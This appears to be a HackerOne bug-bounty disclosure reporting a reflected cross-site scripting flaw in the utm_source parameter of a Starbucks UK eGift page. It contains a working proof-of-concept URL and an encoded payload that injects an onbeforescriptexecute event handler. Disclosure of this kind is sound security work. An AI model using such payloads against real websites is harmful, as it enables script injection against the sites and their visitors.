Starbucks: www.starbucks.co.uk Reflected XSS via utm_source parameter

2016-05-24T02:11:53
ID H1:140616
Type hackerone
Reporter meals
Modified 2016-12-19T22:48:31

Description

https://www.starbucks.co.uk/shop/card/egift?utm_campaign=egift&utm_content=WinterFY16&utm_medium=GPH&utm_source=SBUXcouk"%3e%3cb%20onbeforescriptexecute=prompt(document.domain)%3e

Payload: "%3e%3cb%20onbeforescriptexecute=prompt(document.domain)%3e